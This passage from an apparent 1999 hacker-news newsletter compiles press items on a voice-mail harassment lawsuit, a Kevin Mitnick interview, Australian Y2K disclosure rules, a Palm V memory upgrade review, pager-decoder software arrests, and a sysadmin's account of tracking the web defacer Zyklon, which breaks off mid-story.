       tampering with the voice-mail system. The reporter later pleaded guilty to two felony charges.
 
   **  Thompson's lawsuit, filed in January in DuPage County Circuit Court, seeks in excess of $50,000
       in damages and also names as a defendant ``John Doe,'' the unidentified person who allegedly 
       obtained a distribution password enabling him to send the messages companywide. Thompson said
       he assumes the messenger is a former employee he may have dismissed.
 
       The company insists it reacted swiftly to Thompson's concerns.
 
       ``We believe that the allegations are unfounded,'' said Karen Ramos, a spokeswoman for Jewel.
       ``The company took immediate and appropriate action in response to the unauthorized voice-mail 
       messages in question.''
 
       Thompson's lawyer, Maureen Murphy, said companies are responsible for the systems they offer 
       employees.
 
       ``A little bit more of the burden has to be placed on the company to ensure security against 
       the magnitude of damage that can be done to people with the stroke of a key,'' she said. 
       ``(Companies are) the only ones in a position to stop it.''
 
       One legal expert said while there's no previous case law to draw on for Thompson's lawsuit, the
       old tenets of law apply.
 
        ``It would be kind of like if you had a job in a factory and they gave you a tool to work with
        that was faulty and you got injured,''  said George Trubow, director of the Center for Information
        Technology and Privacy Law at the John Marshall Law School in  Chicago. It is a ``fairly classic, 
        old-fashioned approach to employer liability.''
        
       @HWA
       
  24.0 Mitnick speaks in a rare q and a, (Forbes)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       Via [ISN]
       
       Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>

       http://www.forbes.com/tool/html/99/apr/0405/feat.htm
       
       By Adam L. Penenberg
       Forbes Digital Tool 4-5-99
       
       
       Kevin Mitnick is the most famous hacker in history. He has been in prison
       for more than four years for crimes that, when you get down to it, amount
       to little more than illegally copying proprietary software belonging to
       major companies including Motorola, Nokia and Sun.
       He was made a household name by New York Times reporter John Markoff, who
       featured Mitnick in a book called Cyberpunk (published in 1991), then
       wrote a front page story for the Times on July 4, 1994, that portrayed
       Mitnick as a superhacker who could wreak cyberhavoc--and ruin lives--if
       not caught by the Feds.
       Then a funny thing happened. Markoff's friend, Tsutomu Shimomura, claimed
       that Mitnick had hacked his home computer on Christmas Day, 1994, and went
       after him, with Markoff in tow. When Shimomura tracked Mitnick down in
       North Carolina, Markoff was there for the kill. This was documented in
       subsequent front-page stories and a book called Takedown, for which
       Markoff and Shimomura shared a $750,000 advance. Expect the movie version
       soon.
       
       
       Markoff became a journalism star as a result of his crusade.  Shimomura's
       name, in the ultimate geek tribute, is recognized by Microsoft Word98
       spell check. Not even Sherlock Holmes can say that.
       
       
       Yet, according to Dale Coddington and Brian Martin, both of whom were
       hired by the defense to comb through the 9 gigabytes of electronic
       evidence amassed against Mitnick, there is no proof that Mitnick hacked
       Shimomura. For all the fanfare it received, it was never contained in the
       indictment. Yet, the media coverage has had a profound impact on Mitnick's
       case.
       
       
       Mitnick reads everything written about him and says he often can't believe
       what he reads. He has seen himself portrayed as a "dark side" hacker
       intent on toppling civilization; a criminal who as a teenager penetrated
       computers at NORAD, inspiring the hit flick War Games; a phone phreaker
       who, just by whistling three tones into a telephone receiver, could launch
       World War III; and a computer hacker who, merely armed with a computer
       sans modem, could wreak cyberhavoc from his jail cell. 
       
       
       But the reality is a lot less sexy. Kevin Mitnick is a recreational hacker
       with a compulsive-obsessive relationship to information. He hoarded
       information, never sold it, and wouldn't even share it with his friends. 
       
       
       Although he is portrayed in the upcoming film Takedown as an evil menace
       to society, Mitnick is really just your average geek who has done some bad
       things in his life, and has paid the price. To this day, he would like
       nothing more than to dissect some computer program to see how it works.
       
       
       Says Martin, who often visited Mitnick in prison, "Kevin still wants to
       look through cellular source code to see how it works. You can see it in
       his eyes that he'd love to kick back with a printout and just figure it
       out on his own."
       
       
       Mitnick doesn't trust the media. But he agreed to let Forbes interview him
       over a span of several evenings recently by telephone.
       
       
       Here is Kevin Mitnick in his own words: 
       
       
       Forbes.com [F]: How would you characterize the media coverage of you? 
       
       
       Mitnick [M]: When I read about myself in the media even I don't recognize
       me. The myth of Kevin Mitnick is much more interesting than the reality of
       Kevin Mitnick. If they told the reality, no one would care. 
       
       
       [F] Have stories that John Markoff wrote about you in The New York Times
       had any impact on your legal proceedings?
       
       
       [M] Markoff has single-handedly created "The Myth of Kevin Mitnick," 
       which everyone is using to advance their own agendas. I wasn't a hacker
       for the publicity. I never hacked for personal gain. If I was some unknown
       hacker, accused of copying programs from cell phone companies, I wouldn't
       be here. Markoff's printing false and defamatory material about me on the
       front page of The New York Times had a substantial effect on my case and
       reputation. He's the main reason I'm still in custody.
       
       
       [F] The Times continues to report (most recently on March 18) that you had
       hacked NORAD. Is this true?
       
       
       [M] No way, no how did I break into NORAD. That's a complete myth. And I
       never attempted to access anything considered to be classified government
       systems.
       
       
       [F] What do you think about hacks done in your name--for instance, last
       September's hack of The New York Times web site. Do they further your
       cause?
       
       
       [M] I don't condone anyone causing damage in my name, or doing anything
       malicious in support of my plight. There are more productive ways to help
       me. As a hacker myself, I never intentionally damaged anything.
       
       
       [F] How have you spent most of your time in prison? 
       
       
       [M] Most people here are content watching TV, playing pinochle, dominoes
       and poker. I work on my defense 14 hours a day.
       
       
       [F] What do you think of the restrictions placed on you when you get out
       of prison as part of your plea agreement? 
       
       
       [M] The requirements mandating I can't touch a computer or cell or
       cordless phone are akin to telling a forger not to use a pen or paper.
       There is no way I can earn a living when I get out. I couldn't even work
       at McDonald's. All I could do is something like gardening.
       
       
       [F] What do you plan on doing when you get out of prison? 
       
       
       [M] "I don't know, but once I get out of here and get on with the rest of
       my life, I'll never intentionally violate the law." 
       
       
       What do you think about Kevin Mitnick? Let us know in our forum. 
       
       
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

       @HWA
       
  25.0 Australian stock exchange to carry out threat on Y2K slackers....       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Contributed by Spikeman
     
       This article is located at http://newswire.com.au/9904/name.htm  
        <a href="http://newswire.com.au/9904/name.htm">Aussie Link</a>
                                        
       06/04/99 16:45 
      
       ASX to name Y2K offenders 
       William Maher 
      
       The names of companies that have not disclosed the state of
       their Y2K preparations will be released tomorrow morning by
       the Australian Stock Exchange (ASX). 
      
       The ASX decided to carry through with the threat after it
       received a poor response to its latest Y2K survey of publicly
       listed Australian companies. Under a bill passed earlier this
       year, those companies must reveal the state of their Y2K
       compliance or face suspension by the ASX. 
      
       ASX spokesperson Gloria Peterson said that the response to
       the latest survey had been "disappointing". A total of 1,148
       companies were required to disclose details of their Y2K
       preparations, but a significant proportion failed to meet the
       March 31 deadline. "A great many companies are already
       suspended for something and just thought they didn't have to
       respond. But they were wrong," said Peterson. 
      
       Similarly, the Australian Securities and Investments
       Commission (ASIC) is also experiencing a poor response to its
       demands for Y2K details. Only half of the 700 financial brokers
       and investment advisors responded to ASIC's latest survey. 
      
       ASIC spokesperson Steven Blaney said that over 3,000 firms
       have now been given until mid-May to submit their details, or
       face action from ASIC staff. "I think that people will realise we
       are taking this issue very seriously. If they don't respond they
       should expect a visit from ASIC staff," he told Newswire. 
      
       Blaney added that problems were confined to a small number
       of firms which had not responded to demands for more
       information. For the most part, Blaney expects firms to be on
       track with preparations for 2000. "ASIC has quite a range of
       powers [to deal with non-respondents], but I don't think it will
       come to that," he said. 
      
       In related news, major insurers have limited their insurance
       policies covering Y2K-related disasters. The Insurance Council
       of Australia has said insurers are entitled to limit their policies
       because potential losses due to the millennium bug are
       foreseeable.
      
                                                          
       @HWA
  
  26.0 Hacking the palm pilot V
       ~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://www.wired.com/news/print_version/technology/story/18937.html?wnpg=all
       
       <a href="http://www.wired.com/news/print_version/technology/story/18937.html?wnpg=all">link</a>
       
       
       http://www.wired.com/news/news/technology/story/18937.html
       
       <a href="http://www.wired.com/news/news/technology/story/18937.html">link</a>
       
       
       
       Memory Boost for Palm V
       by Leander Kahney 
       
       3:00 a.m.  3.Apr.99.PST
       A Silicon Valley engineering firm is offering an 8-megabyte memory chip for
       users hungry to expand the un-upgradeable Palm V. 
       
       Because of its small size, sleek look, bright screen and rechargeable 
       batteries, 3Com's new Palm Pilot V is selling well, despite its hefty 
       US$450 price tag and slim 2 MB of memory. 
       
       But thanks to the ingenuity of Palm hackers, the minuscule memory chip can
       now be replaced with a whopping 8-MB module. 
       
       The procedure was first described by Japanese hacker Toshio Kashiwagi, who 
       posted detailed instructions on the Web, with the following warning: 
       
       "You might have to prepare yourself for breaking the machine." 
       
       Kashiwagi used a hairdryer on low power to carefully melt the unit's sealant. 
       After soldering a new RAM chip onto the motherboard, he super-glued
       the two halves back together. 
       
       Electronic Fast Integration Group, an engineering consulting firm based in 
       Los Altos, California, will perform a similar upgrade for US$150. The
       company is planning to offer pre-upgraded units for US$600. 
       
       "This does void the warranty from 3Com," cautioned John Warren, a partner in 
       the firm. "Once we modify them, 3Com won't take them back. They won't support
       the customer at that point, so we have to do it." 
       
       For an extra US$40, EFIG is offering its own one-year warranty, which takes 
       care of everything originally covered under the 3Com warranty. Even though the
       Palm V's 2 MB of memory was made to handle 5,000 addresses, 5 years of 
       appointments, 1,500 to-do items, 1,500 memos and 200 emails, users have been
       clamoring for the upgrades. The success of the Palm has spawned a bewildering
       variety of applications for Web surfing, paging, scheduling, and even street 
       maps and games -- all of which quickly chew up memory. 
       
       Warren said EFIG has been swamped with orders since it began offering the service 
       last week. But he noted that the company had ruined about six Palm V's in the 
       process of refining the procedure, and he cautioned inexperienced hackers against 
       trying it at home. 
       
       "It's a disaster normally," he said. "You have to be prepared to have a few 
       throwaway units." 
       
       News of the upgrade persuaded Albert Lee, a Palm nut who has owned every model of
       the Pilot over the years, to buy the Palm V. "I didn't think I would have the Palm
       V at all if it wasn't for EFIG's upgrade," Lee said. "Two megabytes of memory is 
       just a bit too tight." 
       
       Two days after buying it, Lee shipped his unit to EFIG. It was returned four days 
       later, and Lee wrote a glowing review. 
       
       "I think it was really exceptional work," he said. "I was a little bit worried about
       how they were going to reseal the case. But the results put my doubts to rest." 
       
       "This does void the warranty," said a spokesperson for 3Com. "Our research shows that
       most users don't use two megabytes of memory and would  have a hard time finding a 
       use for eight megabytes." 

       Lee's review:
       
       ** Disclaimer: I have no affiliation with EFIG.com -- this review is done with my
       personal Palm V. 
       
       http://www.cavecreations.com/palmv8/
       <a href="http://www.cavecreations.com/palmv8/">link</a>
       
       Overview
       
       The Palm V (formerly code-named "Razor") is Palm Computing's latest entry into the
       PalmOS palmtop computer line. With this device, Palm Computing reaffirms itself as a
       leader in handheld computing. 
       
       While other competing HPC WinCE devices concentrate on color, more memory, and
       multimedia features, the Palm V retains the most attractive characteristic of PalmOS
       devices -- simple is better. The PalmOS itself has not changed much (PalmOS 3.1)
       over the years. It retains the elegant interface that allows tasks to be completed with
       little learning. While HPCs are becoming more competitive, they require significantly
       faster processors and more memory to perform on par with the PalmOS. 
       
       The Palm V introduces a few improvements which, while evolutionary, are well worth
       the $449 price of entry. Most significant is the sleek new body design, which is slightly
       smaller in length and width than previous Palm devices, but reduces thickness to an
       amazing 0.4". The body is made of anodized aluminum and is easy to hold. This
       design is supplemented by a new Epson display, which significantly improves contrast
       and reduces reflection when compared to earlier Palm devices. 
       
       The contrast dial has been removed, in favor of a software based contrast control
       activated by a button on the top of the unit. The AAA battery bay has been removed in
       favor of an integrated Lithium Ion battery that promises 1 month of use under regular
       conditions. The serial port and HotSync cradle have been redesigned to allow charging
       of the Lithium Ion battery when the unit is resting in the cradle. The Palm V is equipped
       with 2 megabytes of RAM. 
       
       Overall speed has been improved thanks to the new 16 MHz Motorola DragonBall EZ
       CPU. This CPU is essentially the same as previous CPUs, but with fewer wait states.
       Additionally, the PalmOS 3.1 has been recoded and optimized for the EZ processor,
       contributing to the snappy response. 16 MHz does not sound very fast until it is
       experienced with the PalmOS. The operating system is extremely efficient, and offers
       virtually no delay. 
       
       Palm V8 by EFIG.com
       
       While Palm V sales have been brisk, keeping prices high, die-hard Palm users had
       much to complain about the Palm V. While they loved the new industrial design, and
       raved about the changes throughout the Palm V, nobody was really that excited about
       the 2 mb of RAM in the unit -- especially since the unit is sealed and non-upgradeable.
       
       Leave it to the netizens to figure out how to open the case and upgrade the Palm V to
       an amazing 8 megabytes of memory! The first prototype came out of Japan thanks to
       Toshio Kashiwagi. This page was later translated into English by John Lagerling. It
       caused quite a stir. Toshio had successfully unsealed the Palm V without damage,
       and upgraded the memory to 8 mb using a few tools and a new memory chip. 
       
       Suddenly, the Palm V became a lot more appealing. People everywhere wanted the 8
       meg Palm V, but clearly not many people had the skill or the equipment to do the
       upgrade themselves. 
       
       John Figueroa of EFIG.com now offers what everyone has been asking for -- a Palm V
       upgrade service. Mr. Figueroa will upgrade your Palm V to 8 megabytes for the
       surprisingly low cost of $150.00 USD. Additionally, he plans to sell Palm V units
       pre-installed with 8 megs of memory for $600.00 USD. 
       
       Skeptical? Interested but afraid to ship your $400+ unit to EFIG.com for an upgrade?
       Well... I'm going to take the chance and find out for everyone! Let's find out a little bit
       more about me and my unit. 
       
       Why I Waited
       
       I have every single Palm Computing device since the very first "Pilot", which had no
       backlight! A lot has changed since then, and as every Palm upgrade has come out, I
       could always justify the upgrade. My Palm III went with me everywhere I went, and I
       relied on it to keep my life organized. I have owned Newtons, many HPs
       (100LX,200LX,300LX WinCE), as well as several odd palmtops (anybody still remember
       the Poqet computer?). The Palm Computing line of handheld computers were the first
       ones that didn't end up in the nightstand. Size, weight and simplicity were what
       continued to sell me. 
       
       When the Palm V came out, I was first in line for one -- until I realized there was no
       memory increase from my existing Palm III. Following the history of all my Palm
       devices, memory has always doubled. The Pilot 5000 had 512k, the PalmPilot
       Professional had 1 mb, and the Palm III had 2 mb. While I never really filled up the
       memory of the 2 mb model, I hesitated buying a Palm V because it was
       non-upgradeable -- if it ever came to the point where I needed more than 2 mb of
       memory, I was stuck buying a new unit. In the end, there really is no incentive for me
       to spend $400+ to get a unit with the same amount of memory as my Palm III. 
       
       Preparing for the Palm V8
       
       When John Figueroa of EFIG.com offered his upgrade service for the Palm V, I decided
       it was time to get the Palm V. The elegant design, and a realized 8 mb of memory
       would make this device perfect for my needs. While Mr. Figueroa's business seemed
       to be legitimate, I was still a little skeptical. The fit and finish of the Palm V is
       exceptional -- letting someone crack open such a tightly sealed device is enough to
       make anyone nervous. Things I've taken apart never end up looking the same, or
       working as well. 
       
       But someone always has to be first to try new things. Let's take a look at my Palm V,
       which I purchased brand new from Staples on March 17, 1999. 
       
       
       [Images: Full View, Top View, Bottom View, Side View -- follow link for story and images]
       
       These images represent a view of the Palm V from 4 sides. You'll notice that the unit is
       extremely thin, with a very fine seam (only really visible from the top and bottom views).
       
       The Upgrade
       
       The entire upgrade process, from shipping to receiving, should take 4 days. Since I
       shipped on a Thursday, and John is still ramping up for production, it will take slightly
       longer. His overall policy is "In by Monday - ships on Thursday". 
       
       Thursday, March 18, 1999
       John Figueroa gives the go-ahead to ship my Palm V. I back up my entire Palm V
       using BackupBuddy NG, and perform a hard reset. The Palm V hard reset is tricky...
       hold down the power button, press and hold in the reset hole for at least 2 seconds,
       release the reset hole, then release the power button (in that order). Hit Scroll Up to
       erase the memory. I HIGHLY RECOMMEND you use BackupBuddy, even if you never
       upgrade your Palm. Losing data is never fun. 
       
       I stop by the Federal Express station in King of Prussia, PA at around 6:30p. I shipped my
       Palm V via FedEx Priority Overnight ($24), and it is guaranteed to be at EFIG by 10:30a.
       Remember to have EFIG.com's phone number (408-739-8002) when you ship -- the
       FedEx form has a space for it. 
       
       Friday, March 19, 1999
       Spent the morning on the FedEx website tracking the package. Got a little impatient
       until I realized that there was a 3 hour time difference. :) My Palm V arrived at
       EFIG.com at 9:32a Pacific. The tracking was as follows: 
       
       Delivered To : Recept/Frnt desk 
       Delivery Location : SUNNYVALE CA 
       Delivery Date : 03/19 
       Delivery Time : 09:32 
       Signed For By : T.MAIDEN 
       Status Exception : Payment Received 
       Scan Activity : 
       
            Delivered SUNNYVALE CA 03/19 09:32 
            Placed on Van SUNNYVALE CA 03/19 08:42 
            Arrived at FedEx Destination Location SUNNYVALE CA 03/19 08:39 
            Left FedEx Sort Facility OAKLAND CA 03/19 04:50 
            Left FedEx Origin Location KING OF PRUSSIA PA 03/18 19:49 
            Pickup Exception KING OF PRUSSIA PA 03/18 18:29 
       
       It's in John's hands now! John has notified me "We will upgrade it with the first batch of
       the week". 
       
       Monday, March 22, 1999
       John writes me a brief email to confirm my shipping address so that he can pre-print
       labels. Things still look on schedule to receive my unit back toward week's end. 
       
       Tuesday, March 23, 1999
       John has emailed me with the following information: 
       "Your unit has been sealed and is getting our first serial number prototype today at
       11am (my note here: 2:00p Eastern), should ship today too." 
       
       John emails me to let me know the FedEx tracking number for my package. It's
       guaranteed by 10:30a Wednesday. 
       
       Getting The Unit Back
       
       Wednesday, March 24, 1999
       Today is the big day!!! Here's the FedEx tracking information as my Palm V traveled
       back from Sunnyvale, CA: 
       
       Delivered To : Recipient
       Delivery Location : WAYNE PA 
       Delivery Date : 03/24
       Delivery Time : 09:54
       Signed For By : A.MCGUIRE
       Status Exception : 
       Scan Activity : 
       
            Delivered KING OF PRUSSIA PA 03/24 09:54 
            Placed on Van KING OF PRUSSIA PA 03/24 08:27 
            Left FedEx Sort Facility MEMPHIS TN 03/24 04:12 
            Left FedEx Sort Facility MEMPHIS TN 03/24 02:35 
            Left FedEx Origin Location SUNNYVALE CA 03/23 17:10 
            Picked up SUNNYVALE CA 03/23 17:07 
       
       My girlfriend calls at 9:55a -- THE PALM V IS BACK! Took an early break, and drove
       home. 
       
       Looks like the unit was packaged extremely well. It was boxed, and wrapped tightly in
       bubble wrap. The actual unit is in a static safe bag. 
       
       
       The unit turns on easily, and the power indicator seems to be down just a little. I
       HotSync and BackupBuddy restores my databases, and my software to pre-shipping
       condition (1.5 mb takes about 10-15 minutes to reload). The power indicator reads 3.96
       volts (4.07 is fully charged on my unit). It's nice to see ALL THAT MEMORY in my
       Palm V. The bottom gap (as mentioned in two other reviews) is minor, but there. If I
       didn't know better, I wouldn't be able to tell. There are no pry marks or scars on the
       unit. 
       
       Initial verdict: The workmanship is exceptional. 8mb is great. Happy to have my unit
       back! 
       
       A Closer Look After the Upgrade
       
       If you're really concerned with how the case looks after the upgrade, you don't need to
       worry that much. There IS a wider gap in the seam, but the case doesn't budge if I try
       to pull it apart, or push the seams together. It isn't that noticeable unless you put two
       units side-by-side (see The Gadgeteer review). It still fits in the Hotsync cradle -- if the
       gap was bad enough, it wouldn't fit. 
       
       
       
       Honestly, I don't know what I'm doing with 8 mb of memory. :) I've always gotten by in
       the 2 megs of space in the Palm III. The best thing to do is go ahead and install a
       bunch of programs. 
       
       I hopped online and purchased the AccessGuide to NYC ($14.95) and Quo Vadis
       mapping software by Marcosoft ($64.95). AccessGuide is approximately 230k, and
       Quo Vadis is about 90k for the main program, plus all the maps you want (I went
       ahead and got 2 megs worth of maps for the regions I'm in the most (Philadelphia,
       Boston and New York City)). Additionally I downloaded a bunch of DOC files. 
       
       As you can see, I still can't seem to fill it up. I guess I should be pretty happy! Even if I
       tried, I bet I couldn't get more than 5 megs of software into the Palm before I run out of
       things I want to put on it. 
       
       Performance
       
       I topped off the battery, and started playing. So far, I haven't noticed any performance
       difference, or battery difference. Obviously, I've only had it back for a few hours so I'll
       update with long-term effects as I go along. 
       
       Conclusion
       
       It's only been a few hours, but first and foremost, for $150.00 USD, this is the
       cheapest, and best way to get 8 megs into your Palm V without attempting to do the
       upgrade yourself. Mr. Figueroa has definitely demonstrated his ability to open and
       upgrade the Palm V without damaging the unit. The unit is sturdy, and feels brand new.
       My Palm V was only 2 days old prior to shipping to EFIG.com, so it's good to know
       my unit is still in one piece! 
       
       EFIG.com kept an open line of communication with me throughout the upgrade
       progress. This was especially comforting since they were ramping up for mass
       upgrades -- during even the busiest times, John took a minute to keep me posted. 
       
       I HIGHLY and WHOLEHEARTEDLY recommend the EFIG.com upgrade. There is no
       reason to worry. This one is for real! 
       
       Battery Life
       
       Of all the emails I am getting, 95% of them have asked me, "how has battery life been
       affected?". Well, it's really hard to say at this point. Other than the fact the unit only
       came back recently, the biggest thing is every time you HotSync, you charge the
       battery (something you should do everyday, anyway). Every night, if you leave it in the
       charger, it tops off your battery. 
       
       In my case, I just add it to my regular evening routine... drop the StarTAC into the
       charging cradle, plug the Thinkpad into the charger, drop the Clik! drive into the
       charging cradle, and now drop the Palm V into the cradle. 
       
       So what if you're away on vacation? Well, I guess you could bring your cradle (it's
       really NOT that big a deal), or buy the travel kit. So enough preaching... you still want
       to know how long the Palm V with 8 megs will last. 
       
       Battery Life Study
       
       EFIG Engineering presented their battery life study, which displays the following
       statistics: 
       
       (follow link to see chart)
       
       As you can see from EFIG.com, while the unit is off, battery drain is more severe vs.
       the stock Palm V. However, battery life is improved while the unit is on and idle. 
       
       Now you've seen their estimates, let's do a real life test. I went ahead and switched my
       Palm V to do an infrared HotSync. This will enable me to be completely without cradle.
       
       I screwed up royally, so my last experiment needs to be ditched. On March 30, I will
       charge up to a full 4.02V and we will document a day-by-day account of battery life
       without charging. 
       
       I will HotSync twice a day via IR, and continue to use my unit like I normally do every
       day (looking up phone records, entering appointments, regular alarms, PocketQuicken,
       tinkering with applications, etc.) 
       
       It's not in a controlled environment, so your results will vary from mine. However, I think
       it will be fairly representative of what typical use will yield with a Palm V upgraded to 8
       mb while AWAY from the cradle -- again, if you HotSync with the cradle, you are
       recharging and the study is useless to you because your battery will keep topping off. 
       
       
       (follow link to see chart)
       
        Why not to do the upgrade yourself: http://palmvadventures.webjump.com/
        <a href="http://palmvadventures.webjump.com/">PalmVadventures</a>
       
        (N.B. It seems the instructions to perform the upgrade have been pulled from the web;
        if anyone has a link to an English page with the procedure listed please email me,
        tnx .. - Ed )
       
              
       @HWA
       
  27.0 MDT software mentioned in last issue warrants arrests
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       From HNN 
       <a href="www.hackernews.com">www.hackernews.com</a>
       
       contributed to HNN by Silicosis 
       
       There's some weird shit going down with decoding radio
       data signals. After the arrest of Bill Cheeks by the
       Secret Service yesterday many people are very nervous
       as to what will come next. Both WinFlex & PocFlex,
       windows/dos pocsag/flex/golay decoders have pulled
       the software as both developers feel as if they're going
       to be under serious legal fire from Motorola. WinMDT
       also pulled its software, most likely due to the recent
       busts. Interesting that Motorola developed and owns
       the patent on both flex/reflex and mdc4800 (mdt). 

       Here is a mirror of the latest version of some of the MDT
       decoding software. You better grab it now before it too
       disappears. 

       SCANNER TX/RX DECODE SOFTWARE ETC. 
       http://www.kmed70.freeserve.co.uk/kmed70/software.htm
       <a href="http://www.kmed70.freeserve.co.uk/kmed70/software.htm">Link</a> 

       With the rush to press we missed this link yesterday but
       here is Bill Cheeks web site. Lots of good info there that
       may disappear soon. 

       Scannist Extraordinaire 
       http://www.comtronics.net
       <a href="http://www.comtronics.net">Link</a>
                                         
       
       
       @HWA       
      
  28.0 Hot on the trail of Zyklon? BUSTED!
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       April 3rd via HNN, The Toronto Star;
       
       <a href="http://www.cybersurferz.com/zyk-star.jpg">Article scan w/picture</a>
       http://www2.thestar.com/thestar/back_issues/ED19990403/news/990403NEW04_FO-HACKER3.html    
       <a href="http://www2.thestar.com/thestar/back_issues/ED19990403/news/990403NEW04_FO-HACKER3.html">Link</a>
      
      Hack attack: My search for Zyklon 

      He infiltrated my Web site; I tracked him to his lair 

                     By John Howell 
                     Special to The Star

      My battle with the Nazi-inspired hacker Zyklon began on an
      ordinary Monday last March. 

      At the time, I was computer network supervisor for a large
      Toronto company. I received a call from a fellow employee, who
      told me he thought the company Web site ``looked strange.'' 

      I called up the site on my notebook computer, and what I saw
      stopped me in my tracks. Scrawled across the corporate Web
      page, something which is potentially viewed by tens of
      thousands of people, was the declaration: 

      ``THIS SITE IS 0WN3D BY ZYKLON!'' My site had been
      ``hacked,'' vandalized by an electronic thug. 

      He was very proud of what he'd done. He had named himself for
      Zyklon-B, the gas used by the Nazis to exterminate Jews in the
      concentration camps of World War II. He wrote ``0WN3D''
      instead of ``OWNED'' to imitate the lingo favoured by gangsta
      rappers. 

      I contacted our site's Webmaster and together we replaced the
      vandalized Web page. But the implications of what Zyklon had
      done were much more serious. 

      The feeling of having been violated would not go away. I
      decided to track Zyklon to his lair. 

      I am a computer geek. I spend my whole day working on large
      computer networks. I design, optimize and troubleshoot them. I
      love the way computers work and when they don't it's even
      more fun to psychoanalyze them. 

      And I've been following hacking techniques since I started
      computing in the early 1980s. 

      A hacker exploits weaknesses within computer systems to
      access, modify or destroy the information of the computer. In
      most cases hackers will embarrass a company by changing its
      Web page into a pornography page. The more sophisticated
      hacker will access a computer and never let anyone know. He -
      and it's almost always a ``he'' - just sits and watches and learns,
      plotting destruction. 



      Let's get this straight: Hackers are criminals, and smug ones at
      that. To hackers, only their immediate team of hacker friends are
      ``elite.'' They hold all other users of the Internet in complete
      contempt, calling them ``lamers.'' 

      On the Internet you are never completely safe. It's like being an
      excellent driver. No matter how good a driver you are, another
      driver can always crash into you. The vast majority of hackers
      these days are copycats following from recipe books of hacks,
      known as ``exploits.'' 

      There are literally thousands of exploits a hacker can do, making
      it pitifully easy to destroy or disable a computer system. 

      After we fixed the damage to our Web site and closed the
      access that Zyklon had used to change it, I got busy finding
      out about him. 

      I began by making many, many searches on my favourite Web
      search sites, Yahoo! and AltaVista. I typed in search terms
      ``Zyklon,'' ``0wn3d,'' ``hack'' and other words, scouring the
      Internet for other examples of Zyklon's destruction. 

      He had been a very busy vandal. My searches showed he had
      hacked hundreds of Web sites in Canada, the U.S. and around
      the world, targeting such major government operations as
      NATO, the United States Information Agency and the 21st
      Century U.S. Government site, which is dedicated to
      ``transforming governments in the 21st Century.'' 

      The targets varied from small interest groups to big government
      agencies. In some cases home pages had been changed to
      porn. In others Zyklon had created a greeting card to his hacker
      associates and in still others he had caused their Web page to
      be ``mirrored'' - electronically linked - to an anarchy site in
      Sweden. 

      I learned that a certain U.S. state's Web site was so open,
      anyone who knew this could send out press releases posing as
      the state governor. 

      A knowledgeable and determined hacker can access a Web
      server completely through a Web browser, the navigation
      program used to surf the Net. This ``exploit'' uses a back door (a
      login that bypasses security) to give access to the Web site's
      main computer server. 

      Changing the company's site is as simple as typing in a single
      short command such as ``This site is 0wn3d by Zyklon'' to a
      Web page from the Web browser. 

      A common attack is to create a program that will send the
      hacker your password then delete itself. It does its work by
      asking you to enter your password, just as you would do
      everyday. 

      The way this would look is that the computer would say:
      ``Login,'' a prompt most computer users see on their screen at
      least once a day. 

      You would then type in your computer access name, receiving
      back the message ``Incorrect Password.'' You would then retype
      your password, thinking you'd made a mistake the first time.
      What you would really have done is fed your password and
      login name to a hacker. 

      I noticed that on some of the sites Zyklon had hacked there was
      mention of what looked to be a chat group, a place where
      computer users congregate online to gab, via a system called
      Internet Relay Chat (IRC). 

      The tip-off was the electronic signature ``#pascal.'' It meant the
      chat group's name was ``Pascal,'' named after a computer
      programming language developed in the 1970s. 

      I did a search of some common IRC groups - also called
      channels - and not only found Pascal, I also found Zyklon. He
      was the owner of the channel. 

      When I entered his realm I was immediately tagged as coming
      from a site that he had hacked. My nickname that I had given
      myself for the chat was ``Roadkill'' - which I figured was
      appropriate, seeing as how Zyklon had tried to run me over. 

      An automatic look-up called a ``bot'' - short for robot - told
      Zyklon who I was. It was the equivalent of walking through a
      metal detector. 

      ``Heh, heh,'' he chortled, as I entered the chat group. 

      Zyklon started bragging to his Pascal cronies about the
      information he had stolen from me. 

      ``The Webmaster's password (at my company) is: ``getout! Ha,
      ha.'' 

      I didn't rise to Zyklon's bait. I held back - ``lurking,'' as it's called
      - to see if Zyklon would further implicate himself. 

      ``You got in?'' said another Pascal member, identified as
      ``Crystalin.'' 

      ``Getout!'' he said, repeating my password. ``Laugh out loud!
      Someone's getting sick of me.'' 

      ``Heh, heh,'' Crystalin chortled. ``What, did they see you?'' 

      ``No, usually not,'' Zyklon replied. ``But they know when
      someone is there working their magic.'' 

      ``You think Roadkill is snooping on us?'' Zyklon asked. ``Cause
      he found my eggy? (short for ``egg drop,'' another term for a
      hack attack). Or do you think he's just got a (corporate) address
      for no reason? Heh, heh.'' 

      Zyklon turned to another Pascal member, named ``Fluxx.'' 

      ``Fluxxy!'' he said. ``I think someone's trying to find me!'' 

      I had just done my own look-up on him. Zyklon knew it, but I
      got the information I was looking for. I could see where he was
      logging in from. 

      This told me what his Internet service provider was and the ID
      he was logged in as. This was telling exactly where he was on
      the Internet, although at this point I still didn't know his real
      name, or what city he was living in. 

      ``Hey Roadkill,'' Zyklon said, addressing me directly. ``Go to
      your Web site.'' He wanted me to run a particular network utility
      that would look up his Internet address. 

      I remained silent and waiting. 

      ``Oh wait! I deleted it!'' Zyklon crowed, taunting me. 

      He went on to admit that he had hacked my site. 

      ``We just hack (he named my company again) all day, that's
      what we do. . . .'' 

      Zyklon was crowing, but the victory was mine. I had located
      him and got him to admit his crime. 

      I now had enough information to take this into a legal setting. I
      talked to a lawyer. The lawyer contacted the FBI computer
      crimes department. Unfortunately, after an initial interest, no
      one at the FBI seemed too interested. This lack of interest
      frustrated me. 



      I even had trouble convincing people that they'd been hacked
      by Zyklon. Unless they could see the damage he'd actually
      done, they wouldn't believe me. One site operator wouldn't
      believe me until I read him his password file over the phone. 

      I knew I had everything to nail Zyklon. I had the times and
      Internet location and address for him. By October, I had his real
      name and age. He was then 17 years old and living in the
      western United States.

      But there it lay for about three months.

      Early this year a close friend of mine contacted me and let me
      know that he was talking with an associate who had told him
      that his company had been hacked. Out of curiosity, he asked
      for the hacker's name.

